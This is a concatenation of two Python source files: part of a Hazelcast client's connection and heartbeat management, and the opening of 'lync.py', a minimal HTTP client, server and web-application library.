"Removed connection to %s:%s, connection: %s",
remote_address,
remote_uuid,
connection,
)
if not self.active_connections:
disconnected = True
if disconnected:
self._lifecycle_service.fire_lifecycle_event(LifecycleState.DISCONNECTED)
self._trigger_cluster_reconnection()
if removed:
for _, on_connection_closed in self._connection_listeners:
if on_connection_closed:
try:
on_connection_closed(closed_connection)
except:
_logger.exception("Exception in connection listener")
else:
_logger.debug(
"Destroying %s, but there is no mapping for %s in the connection dictionary",
closed_connection,
remote_uuid,
)
def check_invocation_allowed(self):
if self.active_connections:
return
if self._async_start or self._reconnect_mode == ReconnectMode.ASYNC:
raise ClientOfflineError()
else:
raise IOError("No connection found to cluster")
def _get_connection_from_load_balancer(self, should_get_data_member):
load_balancer = self._load_balancer
member = None
if should_get_data_member:
if load_balancer.can_get_next_data_member():
member = load_balancer.next_data_member()
else:
member = load_balancer.next()
if not member:
return None
return self.get_connection(member.uuid)
def _get_or_connect_to_address(self, address):
for connection in list(six.itervalues(self.active_connections)):
if connection.remote_address == address:
return ImmediateFuture(connection)
try:
translated = self._translate(address)
connection = self._create_connection(translated)
return self._authenticate(connection).continue_with(self._on_auth, connection)
except Exception as e:
return ImmediateExceptionFuture(e)
def _get_or_connect_to_member(self, member):
connection = self.active_connections.get(member.uuid, None)
if connection:
return ImmediateFuture(connection)
try:
translated = self._translate(member.address)
connection = self._create_connection(translated)
return self._authenticate(connection).continue_with(self._on_auth, connection)
except Exception as e:
return ImmediateExceptionFuture(e)
def _create_connection(self, address):
factory = self._reactor.connection_factory
return factory(
self,
self._connection_id_generator.get_and_increment(),
address,
self._config,
self._invocation_service.handle_client_message,
)
def _translate(self, address):
translated = self._address_provider.translate(address)
if not translated:
raise ValueError(
"Address provider %s could not translate address %s"
% (self._address_provider.__class__.__name__, address)
)
return translated
def _trigger_cluster_reconnection(self):
if self._reconnect_mode == ReconnectMode.OFF:
_logger.info("Reconnect mode is OFF. Shutting down the client")
self._shutdown_client()
return
if self._lifecycle_service.running:
self._start_connect_to_cluster_thread()
def _init_wait_strategy(self, config):
cluster_connect_timeout = config.cluster_connect_timeout
if cluster_connect_timeout == -1:
# If the no timeout is specified by the
# user, or set to -1 explicitly, set
# the timeout to infinite.
cluster_connect_timeout = _INF
return _WaitStrategy(
config.retry_initial_backoff,
config.retry_max_backoff,
config.retry_multiplier,
cluster_connect_timeout,
config.retry_jitter,
)
def _start_connect_all_members_timer(self):
connecting_uuids = set()
def run():
if not self._lifecycle_service.running:
return
for member in self._cluster_service.get_members():
member_uuid = member.uuid
if self.active_connections.get(member_uuid, None):
continue
if member_uuid in connecting_uuids:
continue
connecting_uuids.add(member_uuid)
if not self._lifecycle_service.running:
break
# Bind the bound_member_uuid to the value
# in this loop iteration
def cb(_, bound_member_uuid=member_uuid):
connecting_uuids.discard(bound_member_uuid)
self._get_or_connect_to_member(member).add_done_callback(cb)
self._connect_all_members_timer = self._reactor.add_timer(1, run)
self._connect_all_members_timer = self._reactor.add_timer(1, run)
def _connect_to_cluster(self):
if self._async_start:
self._start_connect_to_cluster_thread()
else:
self._sync_connect_to_cluster()
def _start_connect_to_cluster_thread(self):
with self._lock:
if self._connect_to_cluster_thread_running:
return
self._connect_to_cluster_thread_running = True
def run():
try:
while True:
self._sync_connect_to_cluster()
with self._lock:
if self.active_connections:
self._connect_to_cluster_thread_running = False
return
except:
_logger.exception("Could not connect to any cluster, shutting down the client")
self._shutdown_client()
t = threading.Thread(target=run, name="hazelcast_async_connection")
t.daemon = True
t.start()
def _shutdown_client(self):
try:
self._client.shutdown()
except:
_logger.exception("Exception during client shutdown")
def _sync_connect_to_cluster(self):
tried_addresses = set()
self._wait_strategy.reset()
try:
while True:
tried_addresses_per_attempt = set()
members = self._cluster_service.get_members()
if self._shuffle_member_list:
random.shuffle(members)
for member in members:
self._check_client_active()
tried_addresses_per_attempt.add(member.address)
connection = self._connect(member, self._get_or_connect_to_member)
if connection:
return
for address in self._get_possible_addresses():
self._check_client_active()
if address in tried_addresses_per_attempt:
# We already tried this address on from the member list
continue
tried_addresses_per_attempt.add(address)
connection = self._connect(address, self._get_or_connect_to_address)
if connection:
return
tried_addresses.update(tried_addresses_per_attempt)
# If the address providers load no addresses (which seems to be possible),
# then the above loop is not entered and the lifecycle check is missing,
# hence we need to repeat the same check at this point.
if not tried_addresses_per_attempt:
self._check_client_active()
if not self._wait_strategy.sleep():
break
except (ClientNotAllowedInClusterError, InvalidConfigurationError):
cluster_name = self._config.cluster_name
_logger.exception("Stopped trying on cluster %s", cluster_name)
cluster_name = self._config.cluster_name
_logger.info(
"Unable to connect to any address from the cluster with name: %s. "
"The following addresses were tried: %s",
cluster_name,
tried_addresses,
)
if self._lifecycle_service.running:
msg = "Unable to connect to any cluster"
else:
msg = "Client is being shutdown"
raise IllegalStateError(msg)
def _connect(self, target, get_or_connect_func):
_logger.info("Trying to connect to %s", target)
try:
return get_or_connect_func(target).result()
except (ClientNotAllowedInClusterError, InvalidConfigurationError) as e:
_logger.warning("Error during initial connection to %s", target, exc_info=True)
raise e
except:
_logger.warning("Error during initial connection to %s", target, exc_info=True)
return None
def _authenticate(self, connection):
client = self._client
cluster_name = self._config.cluster_name
client_name = client.name
request = client_authentication_codec.encode_request(
cluster_name,
None,
None,
self.client_uuid,
CLIENT_TYPE,
SERIALIZATION_VERSION,
__version__,
client_name,
self._labels,
)
invocation = Invocation(
request, connection=connection, urgent=True, response_handler=lambda m: m
)
self._invocation_service.invoke(invocation)
return invocation.future
def _on_auth(self, response, connection):
try:
response = client_authentication_codec.decode_response(response.result())
except Exception as err:
connection.close("Failed to authenticate connection", err)
raise err
status = response["status"]
if status == _AuthenticationStatus.AUTHENTICATED:
return self._handle_successful_auth(response, connection)
if status == _AuthenticationStatus.CREDENTIALS_FAILED:
err = AuthenticationError(
"Authentication failed. The configured cluster name on "
"the client does not match the one configured in the cluster."
)
elif status == _AuthenticationStatus.NOT_ALLOWED_IN_CLUSTER:
err = ClientNotAllowedInClusterError("Client is not allowed in the cluster")
elif status == _AuthenticationStatus.SERIALIZATION_VERSION_MISMATCH:
err = IllegalStateError("Server serialization version does not match to client")
else:
err = AuthenticationError(
"Authentication status code not supported. status: %s" % status
)
connection.close("Failed to authenticate connection", err)
raise err
def _handle_successful_auth(self, response, connection):
with self._lock:
self._check_partition_count(response["partition_count"])
server_version_str = response["server_hazelcast_version"]
remote_address = response["address"]
remote_uuid = response["member_uuid"]
connection.remote_address = remote_address
connection.server_version = calculate_version(server_version_str)
connection.remote_uuid = remote_uuid
existing = self.active_connections.get(remote_uuid, None)
if existing:
connection.close(
"Duplicate connection to same member with UUID: %s" % remote_uuid, None
)
return existing
new_cluster_id = response["cluster_id"]
changed_cluster = self._cluster_id is not None and self._cluster_id != new_cluster_id
if changed_cluster:
self._check_client_state_on_cluster_change(connection)
_logger.warning(
"Switching from current cluster: %s to new cluster: %s",
self._cluster_id,
new_cluster_id,
)
self._on_cluster_restart()
is_initial_connection = not self.active_connections
self.active_connections[remote_uuid] = connection
if is_initial_connection:
self._cluster_id = new_cluster_id
if is_initial_connection:
self._lifecycle_service.fire_lifecycle_event(LifecycleState.CONNECTED)
_logger.info(
"Authenticated with server %s:%s, server version: %s, local address: %s",
remote_address,
remote_uuid,
server_version_str,
connection.local_address,
)
for on_connection_opened, _ in self._connection_listeners:
if on_connection_opened:
try:
on_connection_opened(connection)
except:
_logger.exception("Exception in connection listener")
if not connection.live:
self.on_connection_close(connection)
return connection
def _check_client_state_on_cluster_change(self, connection):
if self.active_connections:
# If there are other connections, we must be connected to the wrong cluster.
# We should not stay connected to this new connection.
# Note that, in some racy scenarios, we might close a connection that
# we can operate on. In those scenarios, we rely on the fact that we will
# reopen the connections.
reason = "Connection does not belong to the cluster %s" % self._cluster_id
connection.close(reason, None)
raise ValueError(reason)
def _on_cluster_restart(self):
self._near_cache_manager.clear_near_caches()
self._cluster_service.clear_member_list()
def _check_partition_count(self, partition_count):
if not self._partition_service.check_and_set_partition_count(partition_count):
raise ClientNotAllowedInClusterError(
"Client can not work with this cluster because it has a "
"different partition count. Expected partition count: %d, "
"Member partition count: %d"
% (self._partition_service.partition_count, partition_count)
)
def _check_client_active(self):
if not self._lifecycle_service.running:
raise HazelcastClientNotActiveError()
def _get_possible_addresses(self):
primaries, secondaries = self._address_provider.load_addresses()
if self._shuffle_member_list:
# The relative order between primary and secondary addresses should
# not be changed. So we shuffle the lists separately and then add
# them to the final list so that secondary addresses are not tried
# before all primary addresses have been tried. Otherwise we can get
# startup delays
random.shuffle(primaries)
random.shuffle(secondaries)
addresses = []
addresses.extend(primaries)
addresses.extend(secondaries)
return addresses
class _HeartbeatManager(object):
_heartbeat_timer = None
def __init__(self, connection_manager, client, config, reactor, invocation_service):
self._connection_manager = connection_manager
self._client = client
self._reactor = reactor
self._invocation_service = invocation_service
self._heartbeat_timeout = config.heartbeat_timeout
self._heartbeat_interval = config.heartbeat_interval
def start(self):
"""Starts sending periodic HeartBeat operations."""
def _heartbeat():
conn_manager = self._connection_manager
if not conn_manager.live:
return
now = time.time()
for connection in list(six.itervalues(conn_manager.active_connections)):
self._check_connection(now, connection)
self._heartbeat_timer = self._reactor.add_timer(self._heartbeat_interval, _heartbeat)
self._heartbeat_timer = self._reactor.add_timer(self._heartbeat_interval, _heartbeat)
def shutdown(self):
"""Stops HeartBeat operations."""
if self._heartbeat_timer:
self._heartbeat_timer.cancel()
def _check_connection(self, now, connection):
if not connection.live:
return
if (now - connection.last_read_time) > self._heartbeat_timeout:
_logger.warning("Heartbeat failed over the connection: %s", connection)
connection.close(
"Heartbeat timed out",
TargetDisconnectedError("Heartbeat timed out to connection %s" % connection),
)
return
if (now - connection.last_write_time) > self._heartbeat_interval:
request = client_ping_codec.encode_request()
invocation = Invocation(request, connection=connection, urgent=True)
self._invocation_service.invoke(invocation)
_frame_header = struct.Struct("<iH")
class _Reader(object):
def __init__(self, builder):
self._buf = io.BytesIO()
self._builder = builder
self._bytes_read = 0
self._bytes_written = 0
# Size of the frame excluding the header (SIZE_OF_FRAME_LENGTH_AND_FLAGS bytes)
self._frame_size = -1
self._frame_flags = 0
self._message = None
def read(self, data):
self._buf.seek(self._bytes_written)
self._buf.write(data)
self._bytes_written += len(data)
def process(self):
message = self._read_message()
while message:
self._builder.on_message(message)
message = self._read_message()
def _read_message(self):
while True:
if self._read_frame():
if self._message.end_frame.is_final_frame():
msg = self._message
self._reset()
return msg
else:
return None
def _read_frame(self):
if self._frame_size == -1:
if self.length < SIZE_OF_FRAME_LENGTH_AND_FLAGS:
# we don't have even the frame length and flags ready
return False
self._read_frame_size_and_flags()
if self.length < self._frame_size:
return False
self._buf.seek(self._bytes_read)
size = self._frame_size
data = self._buf.read(size)
self._bytes_read += size
self._frame_size = -1
# No need to reset flags since it will be overwritten on the next read_frame_size_and_flags call
frame = Frame(data, self._frame_flags)
if not self._message:
self._message = InboundMessage(frame)
else:
self._message.add_frame(frame)
return True
def _read_frame_size_and_flags(self):
self._buf.seek(self._bytes_read)
header_data = self._buf.read(SIZE_OF_FRAME_LENGTH_AND_FLAGS)
self._frame_size, self._frame_flags = _frame_header.unpack_from(header_data, 0)
self._frame_size -= SIZE_OF_FRAME_LENGTH_AND_FLAGS
self._bytes_read += SIZE_OF_FRAME_LENGTH_AND_FLAGS
def _reset(self):
if self._bytes_written == self._bytes_read:
self._buf.seek(0)
self._buf.truncate()
self._bytes_written = 0
self._bytes_read = 0
self._message = None
@property
def length(self):
return self._bytes_written - self._bytes_read
class Connection(object):
"""Connection object which stores connection related information and operations."""
def __init__(self, connection_manager, connection_id, message_callback):
self.remote_address = None
self.remote_uuid = None
self.connected_address = None
self.local_address = None
self.last_read_time = 0
self.last_write_time = 0
self.start_time = 0
self.server_version = UNKNOWN_VERSION
self.live = True
self.close_reason = None
self._connection_manager = connection_manager
self._id = connection_id
self._builder = ClientMessageBuilder(message_callback)
self._reader = _Reader(self._builder)
def send_message(self, message):
"""Sends a message to this connection.
Args:
message (hazelcast.protocol.client_message.OutboundMessage): Message to be sent to this connection.
Returns:
bool: ``True`` if the message is written to the socket, ``False`` otherwise.
"""
if not self.live:
return False
self._write(message.buf)
return True
def close(self, reason, cause):
"""Closes the connection.
Args:
reason (str): The reason this connection is going to be closed. Is allowed to be None.
cause (Exception): The exception responsible for closing this connection. Is allowed to be None.
"""
if not self.live:
return
self.live = False
self.close_reason = reason
self._log_close(reason, cause)
try:
self._inner_close()
except:
_logger.exception("Error while closing the the connection %s", self)
self._connection_manager.on_connection_close(self)
def _log_close(self, reason, cause):
msg = "%s closed. Reason: %s"
if reason:
r = reason
elif cause:
r = cause
else:
r = "Socket explicitly closed"
if self._connection_manager.live:
_logger.info(msg, self, r)
else:
_logger.debug(msg, self, r)
def _inner_close(self):
raise NotImplementedError()
def _write(self, buf):
raise NotImplementedError()
def __eq__(self, other):
return isinstance(other, Connection) and self._id == other._id
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return self._id
class DefaultAddressProvider(object):
"""Provides initial addresses for client to find and connect to a node.
It also provides a no-op translator.
"""
def __init__(self, addresses):
self._addresses = addresses
def load_addresses(self):
"""Returns the possible primary and secondary member addresses to connect to."""
configured_addresses = self._addresses
if not configured_addresses:
configured_addresses = ["127.0.0.1"]
primaries = []
secondaries = []
for address in configured_addresses:
p, s = AddressHelper.get_possible_addresses(address)
primaries.extend(p)
secondaries.extend(s)
return primaries, secondaries
def translate(self, address):
"""No-op address translator.
It is there to provide the same API with other address providers.
"""
return address
|
lync.py
|
import sys
import traceback
import socket
import ssl
import time
import urlparse
import re
import functools
import threading
__VERSION__ = '0.1'
def url_encode(s, encoding='utf-8'):
""" Encode s with percentage-encoding. """
eb = bytearray()
for b in bytearray(s.encode(encoding)):
if b >= 126 or not (97 <= b <= 122 or 65 <= b <= 90 or 48 <= b <= 57 or 45 <= b <= 46 or b == 95):
eb.extend("%%%02x" % b)
else:
eb.append(b)
return str(eb)
def url_decode(s):
""" Decode a string in percentage-encoding. """
original = bytearray()
pos = 0
eb = bytearray(s, encoding='utf-8')
eblen = len(eb)
while pos < eblen:
b = eb[pos]
if b == 37: # ASCII code of '%' is 37
original.append(int(s[pos+1:pos+3], 16))
pos += 2
elif b == 43: # ASCII code of '+' is 43
original.append(' ')
else:
original.append(b)
pos += 1
return str(original)
def url_parse_queries(url):
queries = {}
try:
for q in url.split('?', 1)[1].split('#', 1)[0].split('&'):
kv = q.split('=', 1)
queries[kv[0].strip()] = url_decode(kv[1].strip()) if len(kv) > 1 else ''
except:
pass
return queries
def url_fetch_secure(url, keyfile, certfile, ca_certs, method='GET', headers=None, data=None,
max_redirection=0, limit=10485760):
u = urlparse.urlparse(url)
port = u.port
if u.scheme != 'http' and u.scheme != 'https':
raise AssertionError('unsupported url scheme.')
if not port:
port = 443 if u.scheme == 'https' else 80
req = HTTPRequest(method=method, path=url[len(u.scheme)+3+len(u.netloc):])
if method == 'POST' and data:
req.data = data
if headers:
req.headers = headers
if req.data:
req.headers['Content-Length'] = len(req.data)
if 'Host' not in req:
# Make 'Host' the first header.
req.headers.insert(0, 'Host', u.netloc)
req['Connection'] = 'close'
if 'User-Agent' not in req:
req['User-Agent'] = 'AppleWebKit/537.36'
conn = socket.create_connection((u.hostname, port))
if u.scheme == 'https':
conn = ssl.wrap_socket(conn, keyfile=keyfile, certfile=certfile, ca_certs=ca_certs)
writer = HTTPStreamWriter(conn)
writer.write_request(req)
reader = HTTPStreamReader(conn)
resp = reader.read_response(data_part=True, limit=limit)
conn.close()
if max_redirection > 0 and 301 <= resp.status <= 302:
if 'Location' not in resp:
raise HTTPBadStreamError('bad redirection.')
jmpurl = resp.headers['Location']
return url_fetch_secure(jmpurl, keyfile, certfile, ca_certs, method, headers, data, max_redirection-1, limit)
return resp
def url_fetch(url, method='GET', headers=None, data=None, max_redirection=0, limit=10485760):
return url_fetch_secure(url, None, None, None, method, headers, data, max_redirection, limit)
def html_escape(s):
if not s:
return ''
return s.replace('<', '<').replace('>', '>').replace('&', '&')
class HTTPEOFError(Exception):
def __init__(self, *args, **kwargs):
super(HTTPEOFError, self).__init__(args, kwargs)
class HTTPNetworkError(Exception):
def __init__(self, *args, **kwargs):
super(HTTPNetworkError, self).__init__(args, kwargs)
class HTTPBadStreamError(Exception):
def __init__(self, *args, **kwargs):
super(HTTPBadStreamError, self).__init__(args, kwargs)
class HTTPSizeTooLargeError(Exception):
def __init__(self, *args, **kwargs):
super(HTTPSizeTooLargeError, self).__init__(args, kwargs)
class HTTPHeaders(object):
def __init__(self):
self._items = []
def __contains__(self, item):
return self.find(item) != -1
def __setitem__(self, key, value):
value = str(value)
i = self.find(key)
if i < 0:
self.append(key, value)
self._items[i] = (key, value)
def __getitem__(self, item):
i = self.find(item)
if i < 0:
raise IndexError(str(item) + ' not found')
return self._items[i][1]
def __len__(self):
return len(self._items)
def __str__(self):
s = ['{']
for kv in self._items:
s.append('\'%s\': \'%s\', ' % (str(kv[0]), str(kv[1])))
if self._items:
s[len(self._items)] = s[len(self._items)][:-2] # remove last colon and space
s.append('}')
return ''.join(s)
def get(self, key, default=None):
i = self.find(key)
return self.at(i) if i >= 0 else default
def at(self, i):
return self._items[i][1]
def items(self):
return self._items
def insert(self, i, k, v):
self._items.insert(i, (k, str(v)))
def append(self, k, v):
self._items.append((k, str(v)))
def pop(self, i=-1):
self._items.pop(i)
def remove(self, key):
i = self.find(key)
while i >= 0:
self.pop(i)
i = self.find(key, i)
def find(self, key, start=0):
end = len(self._items)
if start < end:
key = key.lower()
for i in range(start, end):
if self._items[i][0].lower() == key:
return i
return -1
def find_all(self, key, start=0):
lv = []
end = len(self._items)
if start < end:
key = key.lower()
for i in range(start, end):
if self._items[i][0].lower() == key:
lv.append(self._items[i][1])
return lv
def has(self, key, value, start=0):
value = str(value)
for i in range(start, len(self._items)):
if self._items[i] == (key, value):
return i
return -1
def split(self, key, col=';', eq='=', spaces=' '):
""" Splits a header value.
:param key: Name of the header field to be split.
:param col: column separator
:param eq: name/value separator within a column
:param spaces: white space characters that will be stripped.
:return: A dict object.
"""
i = self.find(key)
if i < 0:
return None
values = {}
for p in self._items[i][1].split(col):
kv = p.strip(spaces).split(eq, 1)
values[kv[0]] = kv[1] if len(kv) > 1 else ''
return values
@property
def content_length(self):
length = self.get('Content-Length')
return int(length) if length else None
@property
def content_type(self):
""" Get Content-Type void of parameters. """
ct = self.get('Content-Type')
if ct:
return ct.split(';', 1)[0].strip()
return ''
@property
def charset(self):
params = self.split('Content-Type')
return params.get('charset', '')
class HTTPRequest(object):
def __init__(self, method='GET', path='/', version='HTTP/1.1', headers=None, data=''):
self.method = method
self.path = path
self.version = version
self.headers = HTTPHeaders()
if headers:
for k, v in headers.items():
self.headers.append(k, v)
self.data = data
def __str__(self):
self.format(data_part=True)
def __contains__(self, key):
return self.headers.__contains__(key)
def __getitem__(self, key):
return self.headers.__getitem__(key)
def __setitem__(self, key, value):
return self.headers.__setitem__(key, value)
@property
def startline(self):
return '%s %s %s' % (self.method, self.path, self.version)
@property
def plainpath(self):
q = self.path.find('?')
return url_decode(self.path if q < 0 else self.path[:q])
def format(self, data_part=True):
parts = ['%s %s %s\r\n' % (self.method, self.path, self.version)]
for k, v in self.headers.items():
parts.append(k + ': ' + str(v) + '\r\n')
parts.append('\r\n')
if data_part:
parts.append(self.data)
return ''.join(parts)
class HTTPResponse(object):
def __init__(self, status=200, phrases='OK', version='HTTP/1.1', headers=None, data=''):
self.status = status
self.phrases = phrases
self.version = version
self.headers = HTTPHeaders()
if headers:
for k, v in headers.items():
self.headers.append(k, str(v))
self.data = data
def __str__(self):
return self.format(data_part=True)
def __contains__(self, key):
return self.headers.__contains__(key)
def __getitem__(self, key):
return self.headers.__getitem__(key)
def __setitem__(self, key, value):
return self.headers.__setitem__(key, value)
@property
def statusline(self):
return '%s %d %s' % (self.version, self.status, self.phrases)
def format(self, data_part=True):
parts = ['%s %d %s\r\n' % (self.version, self.status, self.phrases)]
for k, v in self.headers.items():
parts.append(k + ': ' + str(v) + '\r\n')
parts.append('\r\n')
if data_part:
parts.append(self.data)
return ''.join(parts)
class HTTPStreamReader(object):
def __init__(self, sock):
self._sock = sock
self._buf = ''
def _recv(self):
try:
d = self._sock.recv(16384)
except:
raise HTTPNetworkError()
if not d:
raise HTTPEOFError('connection has been closed.')
return d
def read(self, count):
""" Read count bytes from the HTTP stream.
:param count: Number of bytes to read.
:return: A string, length of which is exactly count.
"""
while len(self._buf) < count:
self._buf += self._recv()
d = self._buf[:count]
self._buf = self._buf[count:]
return d
def read_some(self, max_count):
""" Read up to max_count bytes from the HTTP stream.
:param max_count: Maximum number of bytes to read.
:return: A string, length of which ranges from 1 to max_count.
"""
if not self._buf:
self._buf = self._recv()
q = min(max_count, len(self._buf))
d = self._buf[:q]
self._buf = self._buf[q:]
return d
def read_line(self, le='\r\n', limit=16384):
""" Read till a line ending sequence is encountered.
The line ending sequence is not included in the returned string.
This method raises an HTTPSizeTooLargeError when the length of the line exceeds the limit.
:param le: Line ending sequence, defaults to '\r\n'
:param limit: Maximum number of octets allowed.
:return: A string not including the line ending sequence.
"""
while True:
i = self._buf.find(le)
if i >= 0:
line = self._buf[:i]
self._buf = self._buf[i+2:]
return line
else:
if len(self._buf) >= limit:
raise HTTPSizeTooLargeError('line too long.')
self._buf += self._recv()
def read_chunk(self, limit=10485760):
""" Read a chunk from the HTTP stream.
This method raises an HTTPSizeTooLargeError when the length of the line exceeds the limit.
:param limit: Maximum number of octets allowed.
:return: A string that containing the chunk data.
"""
# See RFC7230 for more information about 'chunked' encoding.
# chunk = chunk-size [ chunk-ext ] CRLF
# chunk-data CRLF
# chunk-size = 1*HEXDIG
# last-chunk = 1*("0") [ chunk-ext ] CRLF
# chunk-data = 1*OCTET ; a sequence of chunk-size octets
try:
chunk_size = int(self.read_line(limit=10), 16)
except ValueError:
raise HTTPBadStreamError('invalid chunk head.')
if chunk_size == 0:
return ''
elif chunk_size < 0:
raise HTTPBadStreamError('negative chunk size.')
elif chunk_size > limit:
raise HTTPSizeTooLargeError('chunk too large.')
chunk = self.read(chunk_size)
if '\r\n' != self.read(2):
raise HTTPBadStreamError('invalid chunk ending.')
return chunk
@staticmethod
def _parse_status_line(l):
parts = l.split(' ', 2)
try:
ver = parts[0].strip()
code = int(parts[1].strip())
phr = parts[2].strip()
return ver, code, phr
except:
raise HTTPBadStreamError('bad status line.')
@staticmethod
def _parse_request_line(l):
parts = l.split(' ', 2)
try:
method = parts[0].strip()
path = parts[1].strip()
ver = parts[2].strip()
return method, path, ver
except:
raise HTTPBadStreamError('bad request line.')
@staticmethod
def _parse_header_line(l):
parts = l.split(':', 1)
try:
key = parts[0].strip()
value = parts[1].strip()
return key, value
except:
raise HTTPBadStreamError('bad header line.')
def read_request(self, data_part=True, limit=65536):
""" Extracts an HTTP request message from the stream.
:param data_part: If data_part is set True, the entire message body will be load into the data field of
the returned HTTPRequest object. Otherwise, the message body is not extracted.
:param limit: Maximum number of octets allowed.
:return: An HTTPRequest object.
"""
req = HTTPRequest()
line = self.read_line(limit=limit)
req.method, req.path, req.version = self._parse_request_line(line)
while True:
limit -= len(line) + 2
line = self.read_line(limit=limit)
if not line:
break
k, v = self._parse_header_line(line)
req.headers.append(k, v)
if data_part and req.method == 'POST':
if 'Content-Length' in req:
# explicit sized
length = int(req['Content-Length'])
if length > limit:
raise HTTPSizeTooLargeError('entity size too large.')
req.data = self.read(length)
limit -= length
elif req.headers.has('Transfer-Encoding', 'chunked') >= 0:
# implied by 'chunked' encoding
data = []
chunk = self.read_chunk(limit=limit)
while chunk:
limit -= len(chunk) + 2
data.append(chunk)
req.data = ''.join(data)
# trailers
line = self.read_line(limit=limit)
while line:
k, v = self._parse_header_line(line)
req.headers.append(k, v)
else:
raise HTTPBadStreamError('indeterminate request body size.')
return req
def read_response(self, data_part=True, limit=65536):
""" Extracts an HTTP response message from the stream.
:param data_part: If data_part is set True, the entire message body will be load into the data field of
the returned HTTPResponse object. Otherwise, the message body is not extracted.
:param limit: Maximum number of octets allowed.
:return: An HTTPResponse object.
"""
resp = HTTPResponse()
line = self.read_line(limit=limit)
resp.version, resp.status, resp.phrases = self._parse_status_line(line)
while True:
limit -= len(line) + 2
line = self.read_line(limit=limit)
if not line:
break
k, v = self._parse_header_line(line)
resp.headers.append(k, v)
if data_part:
if 'Content-Length' in resp:
# explicit sized
length = int(resp['Content-Length'])
if length > limit:
raise HTTPSizeTooLargeError('entity size too large.')
resp.data = self.read(length)
limit -= length
elif resp.headers.has('Transfer-Encoding', 'chunked') >= 0:
# implied by 'chunked' encoding
data = []
chunk = self.read_chunk(limit=limit)
while chunk:
limit -= len(chunk) + 2
data.append(chunk)
resp.data = ''.join(data)
# trailers
line = self.read_line(limit=limit)
limit -= len(line) + 2
while line:
k, v = self._parse_header_line(line)
resp.headers.append(k, v)
elif resp.headers.has('Connection', 'close') or resp.version == 'HTTP/1.0':
# implied by EOF
data = []
try:
while True:
data.append(self.read_some(limit))
limit -= len(data[-1])
except HTTPEOFError:
pass
resp.data = ''.join(data)
else:
raise HTTPBadStreamError('indeterminate response body size.')
return resp
class HTTPStreamWriter(object):
def __init__(self, sock):
self._sock = sock
def write(self, data):
while data:
n = self._sock.send(data)
if n < 1:
raise HTTPNetworkError('write to socket failed.')
data = data[n:]
def write_line(self, data):
self.write(data)
self.write('\r\n')
def write_chunk(self, chunk):
self.write('%x\r\n' % len(chunk))
self.write(chunk)
self.write('\r\n')
def write_request(self, req, data_part=True):
self.write(req.format(data_part=False))
if data_part:
self.write(req.data)
def write_response(self, resp, data_part=True):
self.write(resp.format(data_part=False))
if data_part:
self.write(resp.data)
class HTTPGenericError(Exception, HTTPResponse):
def __init__(self, status=200, phrases='OK'):
Exception.__init__(self)
HTTPResponse.__init__(self, status, phrases)
class HTTPMovedPermanently(HTTPGenericError):
def __init__(self, location):
super(HTTPMovedPermanently, self).__init__(301, 'Moved Permanently')
self.headers.append('Location', location)
class HTTPMovedTemporarily(HTTPGenericError):
def __init__(self, location):
super(HTTPMovedTemporarily, self).__init__(302, 'Found')
self.headers.append('Location', location)
class HTTPBadRequest(HTTPGenericError):
def __init__(self):
super(HTTPBadRequest, self).__init__(400, 'Bad Request')
class HTTPNotFound(HTTPGenericError):
def __init__(self):
super(HTTPNotFound, self).__init__(404, 'Not Found')
class HTTPServerError(HTTPGenericError):
def __init__(self):
super(HTTPServerError, self).__init__(500, 'Server Error')
class HTTPBadGateway(HTTPGenericError):
def __init__(self):
super(HTTPBadGateway, self).__init__(502, 'Bad Gateway')
class WebSessionContext(object):
def __init__(self, sock):
self.input = HTTPStreamReader(sock)
self.output = HTTPStreamWriter(sock)
self.request = None
self.response = None
self.error = None
# Number of requests received from current connection.
# The web server increases this counter automatically, web applications may
# not modify this field.
self.request_count = 0
# Application specific data. This field is valid along with the connection.
self.data = None
# If do_not_reply is set True, the web server will not send the response
# message to the client. In case the response message has been sent within
# the request handler, this flag should be set to True.
# ***This field is reset per request.***
self.do_not_reply = False
# If do_not_modify is set True, the web server will forward the response
# message to the client without any modification. By default, the web
# server checks the response message for missing headers and adds extra
# fields to the message, like 'Content-Type', 'Content-Length', etc., before
# sending it to the client.
# ***This field is reset per request.***
self.do_not_modify = False
# keep_alive indicates whether the connection should be kept alive.
# If keep_alive is set to False, the web server will close the connection
# immediately after the response message is sent.
self.keep_alive = True
# switch_protocol indicates whether the connection has been taken over by
# other protocols. If switch_protocol is set to True, the web server will
# not operate the connection any further, thus it's the web application's
# obligation to manage the connection.
# A typical scenario of using this field is handling a CONNECT request.
self.switch_protocol = False
def update(self, request):
self.do_not_modify = False
self.do_not_reply = False
self.error = None
self.request = request
self.response = HTTPResponse(200, 'OK')
self.request_count += 1
class WebApplication(object):
""" Decorates a class to make it a web application. """
def __init__(self, root='/', host='*'):
if not root.endswith('/'):
root += '/'
self.root = root
self.host = host
self.entries = {}
def __call__(self, klass):
""" When WebApplication object is used as decorator, this method will be called.
:param klass: The class to be decorated.
:return: The decorated class.
"""
klass.webapp = WebApplication(root=self.root, host=self.host)
for name, handler in klass.__dict__.items():
if type(handler) == WebApplicationHandler:
handler.name = name
klass.webapp.register(handler)
return klass
def register(self, handler):
""" Registers a handler
:param handler: WebApplicationHandler object, the handler to be registered.
"""
self.entries[handler.path] = handler
def map(self, context):
""" Maps a request to a handler.
:param context: The session context.
:return: The name of the handler, a string.
"""
req = context.request
# Remove heading app path
handler_path = req.path[len(self.root)-1:]
# For relative paths, the query part and fragment part should be removed
if req.path[0] == '/':
q = handler_path.find('?')
if q >= 0:
handler_path = handler_path[:q]
for handler in self.entries.values():
if req.method == handler.method:
# Use naive string compare in strict mode, in this case handler.pathre is None
if (handler.pathre is None and handler.path == handler_path) or\
(handler.pathre and handler.pathre.match(handler_path)):
return handler
return None
class WebApplicationHandler(object):
""" Decorates a method to make it a request handler. """
def __init__(self, func=None, pattern='/', strict=True, method='GET'):
"""
:param func: Name of the handler method.
:param pattern: Pattern of paths that the handler bounds to.
:param strict: Use strict matching mode or not.
:param method: HTTP method that the handler accepts.
"""
self.path = pattern
self.pathre = re.compile(pattern) if not strict else None
self.name = ''
self.func = func
self.method = method
def __get__(self, instance, owner):
""" This method is called when WebApplicationHandler is used as a descriptor. """
return functools.partial(self.func, instance)
def __call__(self, func):
""" This method is called when a descriptor is required. """
return WebApplicationHandler(func, self.path, self.pathre is None, self.method)
def WebServerConfiguration():
""" Generates a default WebServer configuration.
:return: a dict object.
"""
conf = {
WebServer.CONF_SERVER_LISTEN: 'localhost:8080',
WebServer.CONF_THREAD_POOL_SIZE: 4,
WebServer.CONF_SERVER_NAME: 'lync',
